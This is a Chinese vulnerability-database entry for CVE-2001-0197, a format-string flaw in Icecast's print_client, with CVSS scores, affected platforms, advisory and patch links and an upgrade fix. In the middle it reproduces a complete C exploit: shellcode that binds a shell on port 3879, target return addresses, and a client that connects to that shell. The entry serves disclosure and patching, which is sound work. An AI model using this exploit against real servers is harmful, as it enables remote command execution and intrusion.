CVE-2001-0197
CVSS10.0
发布时间 :2001-03-26 00:00:00
修订时间 :2008-09-05 16:23:30
NMCOE    

[原文]Format string vulnerability in print_client in icecast 1.3.8beta2 and earlier allows remote attackers to execute arbitrary commands.


[CNNVD]Icecast print_client命令执行漏洞(CNNVD-200103-090)

        Icecast 1.3.8beta2及其之前版本的print_client存在格式化字符串漏洞。远程攻击者可以利用该漏洞执行任意命令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:redhat:linux:6.2Red Hat Linux 6.2
cpe:/o:redhat:linux:6.1Red Hat Linux 6.1
cpe:/a:icecast:icecast:1.3.8_beta2
cpe:/o:redhat:linux:6.0Red Hat Linux 6.0
cpe:/o:redhat:linux:7.0Red Hat Linux 7.0
cpe:/a:icecast:icecast:1.3.7

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0197
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0197
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200103-090
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/2264
(VENDOR_ADVISORY)  BID  2264
http://www.redhat.com/support/errata/RHSA-2001-004.html
(PATCH)  REDHAT  RHSA-2001:004
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000374
(PATCH)  CONECTIVA  CLA-2001:374
http://archives.neohapsis.com/archives/bugtraq/2001-01/0348.html
(VENDOR_ADVISORY)  BUGTRAQ  20010121 [pkc] format bugs in icecast 1.3.8b2 and prior
http://xforce.iss.net/static/5978.php
(VENDOR_ADVISORY)  XF  icecast-format-string

- 漏洞信息

Icecast print_client命令执行漏洞
危急 格式化字符串
2001-03-26 00:00:00 2005-05-02 00:00:00
远程  
        Icecast 1.3.8beta2及其之前版本的print_client存在格式化字符串漏洞。远程攻击者可以利用该漏洞执行任意命令。

- 公告与补丁

        

- 漏洞信息 (20582)

Icecast 1.3.7/1.3.8 print_client() Format String Vulnerability (EDBID:20582)
windows remote
2001-01-21 Verified
0 CyRaX
N/A [点击下载]
source: http://www.securityfocus.com/bid/2264/info

Versions of icecast up to and including 1.3.8 beta2 exhibit a format string vulnerability in the print_client()function of utility.c. A malicious user can cause the *printf function to overwrite memory at possibly arbitrary addresses. 

* Exploits format string vulnerability in icecast 1.3.7
 * Coded by |CyRaX| <cyrax@pkcrew.org>
 * Packet Knights Crew http://www.pkcrew.org/
 *
*/




#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <netinet/in.h>

char code[]=
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";

unsigned long ip;
void try_it();

struct target{
   char *name;
   char *addr1;
   char *addr2;
   char *addr3;
   char *addr4;
   u_short one;
   u_short two;
   u_short three;
   u_short xx;
   u_short pad;

};



int main(int argc,char **argv){
   int s,i,sel;
   struct sockaddr_in sk;
   char sndbuff[9000],xx[9000],one[300],two[300],three[300],nop[1000],pad[100];
   struct target tl[]={
        {
           "icecast-1.3.7.tar.gz compiled on Slackware 7.0",
           "\x1c\xdb\x5f\xbf",
           "\x1d\xdb\x5f\xbf",
           "\x1e\xdb\x5f\xbf",
           "\x1f\xdb\x5f\xbf",
           123,
           136,
           96,
           2076,
           5
        },
        {
           "icecast-1.3.7.tar.gz compiled on Redhat 7.0",
           "\xd8\xd8\x5f\xbf",
           "\xd9\xd8\x5f\xbf",
           "\xda\xd8\x5f\xbf",
           "\xdb\xd8\x5f\xbf",
           116,
           159,
           96,
           2074,
           3
        }
   };

   printf("Icecast 1.3.7 format bug exploit by |CyRaX| <cyrax@pkcrew.org\n");
   printf("Packet Knights Crew | http://www.pkcrew.org/\n");

   if(argc<4){
      printf("Usage : ./PKCicecast-ex <target> <port> <type>\n");
      printf("types are :\n");
      for(i=0;i<(sizeof(tl)/sizeof(struct target));i++){
         printf("%2i : %s\n",i,tl[i].name);
      }
      exit(0);
   }

   sel=atoi(argv[3]);
   memset(sndbuff,0,9000);
   memset(xx,0,9000);
   memset(one,0,300);
   memset(two,0,300);
   memset(three,0,300);
   memset(pad,0,100);
   memset(nop,'\x90',1000);
   nop[1000]=0;

   s=socket(AF_INET,SOCK_STREAM,0);

   ip=inet_addr(argv[1]);
   sk.sin_addr.s_addr=ip;
   sk.sin_port=htons(atoi(argv[2]));
   sk.sin_family=AF_INET;
   connect(s,(struct sockaddr *)&sk,sizeof(sk));
   strcpy(sndbuff,"GET / HTTP/1.0\n");
   send(s,sndbuff,strlen(sndbuff),0);

   for(i=0;i<=(tl[sel].xx*3);i+=3){
      memcpy(xx+i,"%8x",3);
   }
   memset(one,'\x90',tl[sel].one);
   memset(two,'\x90',tl[sel].two);
   memset(three,'\x90',tl[sel].three);
   memcpy(one+strlen(one)-2,"\xeb\x02",2);
   memcpy(two+strlen(two)-2,"\xeb\x02",2);
   memcpy(three+strlen(three)-2,"\xeb\x02",2);
   memset(pad,'X',tl[sel].pad);
   sprintf(sndbuff,"User-agent: %s"
   "%s"
   "%s"
   "%s"
   "%s"
   "%s" /* the %8x */
   "%%n"
   "%s%%n"
   "%s%%n"
   "%s%%n"
   "%s"
   "%s\n\n"
   ,pad,tl[sel].addr1,tl[sel].addr2,tl[sel].addr3,tl[sel].addr4,
           xx,one,two,three,nop,code);
   send(s,sndbuff,strlen(sndbuff),0);
   printf("We must sleep for 120 seconds. Waiting for icecast to do the statistic\n");
   alarm(120);
   signal(SIGALRM,try_it);
   while(1)recv(s,sndbuff,9000,0);
}

void try_it(){
   struct sockaddr_in sk;
   int s;
   char buff[1000];
   fd_set fs;

   printf("trying!\n");
   sk.sin_addr.s_addr=ip;
   sk.sin_port=htons(3879);
   sk.sin_family=AF_INET;
   s=socket(AF_INET,SOCK_STREAM,0);
   if(connect(s,(struct sock_addr*)&sk,sizeof(sk))==-1){
      printf("sorry.. it did'nt worked\n");
      exit(0);
   }
   strcpy(buff,"uname -a;id\n");
   send(s,buff,strlen(buff),0);
   while(1){
      memset(buff,0,1000);
      FD_ZERO(&fs);
      FD_SET(0,&fs);
      FD_SET(s,&fs);
      select(s+1,&fs,NULL,NULL,NULL);
      if(FD_ISSET(0,&fs)){
         fgets(buff,1000,stdin);
         send(s,buff,strlen(buff),0);
      }
      if(FD_ISSET(s,&fs)){
         recv(s,buff,1000,0);
         printf("%s",buff);
      }
   }

}



		

- 漏洞信息

496
Icecast utils.c fd_write Function Format String
Local / Remote, Context Dependent Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2001-01-22 Unknow
2001-01-22 Unknow

- 解决方案

Upgrade to version 1.3.10 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站